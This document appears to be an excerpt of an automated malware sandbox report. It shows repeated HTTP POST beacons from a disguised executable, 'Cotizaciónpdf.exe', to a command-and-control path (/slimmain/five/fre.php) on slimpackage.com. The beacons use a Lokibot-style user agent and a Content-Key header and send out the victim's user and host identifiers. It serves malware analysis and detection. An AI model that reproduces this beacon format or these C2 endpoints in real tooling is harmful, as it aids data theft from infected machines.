Jan 14, 2022 17:28:16.872795105 CET	1226	IN	HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 16:28:15 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
20	192.168.2.5	49781	104.223.93.105	80	C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Timestamp	kBytes transferred	Direction	Data
Jan 14, 2022 17:28:54.036242008 CET	1291	OUT	POST /slimmain/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: slimpackage.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: CC3B1AE Content-Length: 165 Connection: close
Jan 14, 2022 17:28:54.165677071 CET	1291	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 34 00 32 00 32 00 39 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 Data Ascii: (ckav.rualfons642294DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jan 14, 2022 17:28:54.306258917 CET	1292	IN	HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 16:28:53 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
21	192.168.2.5	49782	104.223.93.105	80	C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Timestamp	kBytes transferred	Direction	Data
Jan 14, 2022 17:28:55.470160961 CET	1293	OUT	POST /slimmain/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: slimpackage.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: CC3B1AE Content-Length: 165 Connection: close
Jan 14, 2022 17:28:55.678987980 CET	1293	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 34 00 32 00 32 00 39 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 Data Ascii: (ckav.rualfons642294DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jan 14, 2022 17:28:55.988012075 CET	1293	IN	HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 16:28:54 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
22	192.168.2.5	49784	104.223.93.105	80	C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Timestamp	kBytes transferred	Direction	Data
Jan 14, 2022 17:28:57.622553110 CET	1299	OUT	POST /slimmain/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: slimpackage.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: CC3B1AE Content-Length: 165 Connection: close
Jan 14, 2022 17:28:57.754698992 CET	1300	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 34 00 32 00 32 00 39 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 Data Ascii: (ckav.rualfons642294DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jan 14, 2022 17:28:57.906794071 CET	1306	IN	HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 16:28:56 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
23	192.168.2.5	49791	104.223.93.105	80	C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Timestamp	kBytes transferred	Direction	Data
Jan 14, 2022 17:28:59.015616894 CET	1319	OUT	POST /slimmain/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: slimpackage.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: CC3B1AE Content-Length: 165 Connection: close
Jan 14, 2022 17:28:59.146729946 CET	1320	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 34 00 32 00 32 00 39 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 Data Ascii: (ckav.rualfons642294DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jan 14, 2022 17:28:59.285082102 CET	1322	IN	HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 16:28:58 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
24	192.168.2.5	49799	104.223.93.105	80	C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Timestamp	kBytes transferred	Direction	Data
Jan 14, 2022 17:29:00.450387001 CET	1335	OUT	POST /slimmain/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: slimpackage.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: CC3B1AE Content-Length: 165 Connection: close
Jan 14, 2022 17:29:00.578438044 CET	1337	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 34 00 32 00 32 00 39 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 Data Ascii: (ckav.rualfons642294DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jan 14, 2022 17:29:00.713493109 CET	1340	IN	HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 16:28:59 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
25	192.168.2.5	49806	104.223.93.105	80	C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Timestamp	kBytes transferred	Direction	Data
Jan 14, 2022 17:29:01.829359055 CET	1352	OUT	POST /slimmain/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: slimpackage.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: CC3B1AE Content-Length: 165 Connection: close
Jan 14, 2022 17:29:01.960654974 CET	1355	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 34 00 32 00 32 00 39 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 Data Ascii: (ckav.rualfons642294DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jan 14, 2022 17:29:02.098814964 CET	1356	IN	HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 16:29:01 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
26	192.168.2.5	49812	104.223.93.105	80	C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Timestamp	kBytes transferred	Direction	Data
Jan 14, 2022 17:29:03.362296104 CET	1365	OUT	POST /slimmain/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: slimpackage.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: CC3B1AE Content-Length: 165 Connection: close
Jan 14, 2022 17:29:03.495379925 CET	1365	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 34 00 32 00 32 00 39 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 Data Ascii: (ckav.rualfons642294DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jan 14, 2022 17:29:03.634512901 CET	1365	IN	HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 16:29:02 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
27	192.168.2.5	49813	104.223.93.105	80	C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Timestamp	kBytes transferred	Direction	Data
Jan 14, 2022 17:29:05.461335897 CET	1366	OUT	POST /slimmain/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: slimpackage.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: CC3B1AE Content-Length: 165 Connection: close
Jan 14, 2022 17:29:05.592464924 CET	1367	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 34 00 32 00 32 00 39 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 Data Ascii: (ckav.rualfons642294DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jan 14, 2022 17:29:05.731496096 CET	1367	IN	HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 16:29:04 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
28	192.168.2.5	49814	104.223.93.105	80	C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Timestamp	kBytes transferred	Direction	Data
Jan 14, 2022 17:29:07.046101093 CET	1368	OUT	POST /slimmain/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: slimpackage.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: CC3B1AE Content-Length: 165 Connection: close
Jan 14, 2022 17:29:07.177156925 CET	1368	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 34 00 32 00 32 00 39 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 Data Ascii: (ckav.rualfons642294DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jan 14, 2022 17:29:07.317964077 CET	1368	IN	HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 16:29:06 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
29	192.168.2.5	49815	104.223.93.105	80	C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Timestamp	kBytes transferred	Direction	Data
Jan 14, 2022 17:29:08.406847000 CET	1369	OUT	POST /slimmain/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: slimpackage.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: CC3B1AE Content-Length: 165 Connection: close
Jan 14, 2022 17:29:08.563952923 CET	1369	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 34 00 32 00 32 00 39 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 Data Ascii: (ckav.rualfons642294DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jan 14, 2022 17:29:08.702689886 CET	1370	IN	HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 16:29:07 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.5	49761	104.223.93.105	80	C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Timestamp	kBytes transferred	Direction	Data
Jan 14, 2022 17:28:18.954071045 CET	1235	OUT	POST /slimmain/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: slimpackage.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: CC3B1AE Content-Length: 165 Connection: close
Jan 14, 2022 17:28:19.083688021 CET	1235	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 34 00 32 00 32 00 39 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 Data Ascii: (ckav.rualfons642294DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jan 14, 2022 17:28:19.221434116 CET	1235	IN	HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 16:28:18 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
30	192.168.2.5	49818	104.223.93.105	80	C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Timestamp	kBytes transferred	Direction	Data
Jan 14, 2022 17:29:11.296372890 CET	1416	OUT	POST /slimmain/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: slimpackage.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: CC3B1AE Content-Length: 165 Connection: close
Jan 14, 2022 17:29:11.436233997 CET	1416	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 34 00 32 00 32 00 39 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 Data Ascii: (ckav.rualfons642294DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jan 14, 2022 17:29:11.635201931 CET	1417	IN	HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 16:29:10 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
31	192.168.2.5	49819	104.223.93.105	80	C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Timestamp	kBytes transferred	Direction	Data
Jan 14, 2022 17:29:14.185842991 CET	1418	OUT	POST /slimmain/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: slimpackage.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: CC3B1AE Content-Length: 165 Connection: close
Jan 14, 2022 17:29:14.315494061 CET	1418	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 34 00 32 00 32 00 39 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 Data Ascii: (ckav.rualfons642294DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jan 14, 2022 17:29:14.455641985 CET	1418	IN	HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 16:29:13 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
32	192.168.2.5	49820	104.223.93.105	80	C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Timestamp	kBytes transferred	Direction	Data
Jan 14, 2022 17:29:16.911808014 CET	1419	OUT	POST /slimmain/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: slimpackage.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: CC3B1AE Content-Length: 165 Connection: close
Jan 14, 2022 17:29:17.044059038 CET	1419	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 34 00 32 00 32 00 39 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 Data Ascii: (ckav.rualfons642294DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jan 14, 2022 17:29:17.182404995 CET	1419	IN	HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 16:29:16 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
33	192.168.2.5	49821	104.223.93.105	80	C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Timestamp	kBytes transferred	Direction	Data
Jan 14, 2022 17:29:18.692194939 CET	1441	OUT	POST /slimmain/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: slimpackage.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: CC3B1AE Content-Length: 165 Connection: close
Jan 14, 2022 17:29:18.828167915 CET	1441	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 34 00 32 00 32 00 39 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 Data Ascii: (ckav.rualfons642294DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jan 14, 2022 17:29:18.968348026 CET	1601	IN	HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 16:29:17 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
34	192.168.2.5	49827	104.223.93.105	80	C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Timestamp	kBytes transferred	Direction	Data
Jan 14, 2022 17:29:23.575057983 CET	9163	OUT	POST /slimmain/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: slimpackage.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: CC3B1AE Content-Length: 165 Connection: close
Jan 14, 2022 17:29:23.703351974 CET	9164	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 34 00 32 00 32 00 39 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 Data Ascii: (ckav.rualfons642294DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jan 14, 2022 17:29:23.841211081 CET	9164	IN	HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 16:29:22 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
35	192.168.2.5	49828	104.223.93.105	80	C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Timestamp	kBytes transferred	Direction	Data
Jan 14, 2022 17:29:25.832127094 CET	9165	OUT	POST /slimmain/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: slimpackage.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: CC3B1AE Content-Length: 165 Connection: close
Jan 14, 2022 17:29:25.991719007 CET	9165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 34 00 32 00 32 00 39 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 Data Ascii: (ckav.rualfons642294DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jan 14, 2022 17:29:26.144282103 CET	9165	IN	HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 16:29:25 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
36	192.168.2.5	49830	104.223.93.105	80	C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Timestamp	kBytes transferred	Direction	Data
Jan 14, 2022 17:29:27.728215933 CET	9929	OUT	POST /slimmain/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: slimpackage.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: CC3B1AE Content-Length: 165 Connection: close
Jan 14, 2022 17:29:27.859743118 CET	9930	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 34 00 32 00 32 00 39 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 Data Ascii: (ckav.rualfons642294DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jan 14, 2022 17:29:27.998682022 CET	9930	IN	HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 16:29:26 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
37	192.168.2.5	49831	104.223.93.105	80	C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Timestamp	kBytes transferred	Direction	Data
Jan 14, 2022 17:29:30.416867971 CET	9931	OUT	POST /slimmain/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: slimpackage.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: CC3B1AE Content-Length: 165 Connection: close
Jan 14, 2022 17:29:31.113910913 CET	9931	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 34 00 32 00 32 00 39 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 Data Ascii: (ckav.rualfons642294DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jan 14, 2022 17:29:31.827066898 CET	9931	IN	HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 16:29:29 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
38	192.168.2.5	49832	104.223.93.105	80	C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Timestamp	kBytes transferred	Direction	Data
Jan 14, 2022 17:29:33.215694904 CET	9932	OUT	POST /slimmain/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: slimpackage.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: CC3B1AE Content-Length: 165 Connection: close
Jan 14, 2022 17:29:33.467804909 CET	9932	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 34 00 32 00 32 00 39 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 Data Ascii: (ckav.rualfons642294DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jan 14, 2022 17:29:33.815031052 CET	9933	IN	HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 16:29:32 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
39	192.168.2.5	49833	104.223.93.105	80	C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Timestamp	kBytes transferred	Direction	Data
Jan 14, 2022 17:29:34.891024113 CET	9934	OUT	POST /slimmain/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: slimpackage.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: CC3B1AE Content-Length: 165 Connection: close
Jan 14, 2022 17:29:35.032548904 CET	9934	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 34 00 32 00 32 00 39 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 Data Ascii: (ckav.rualfons642294DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jan 14, 2022 17:29:35.322861910 CET	9934	IN	HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 16:29:34 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.5	49762	104.223.93.105	80	C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Timestamp	kBytes transferred	Direction	Data
Jan 14, 2022 17:28:21.450628042 CET	1236	OUT	POST /slimmain/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: slimpackage.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: CC3B1AE Content-Length: 165 Connection: close
Jan 14, 2022 17:28:21.580569983 CET	1237	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 34 00 32 00 32 00 39 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 Data Ascii: (ckav.rualfons642294DESKTOP-716T77108F9C4E9C79A3B52B3F739430
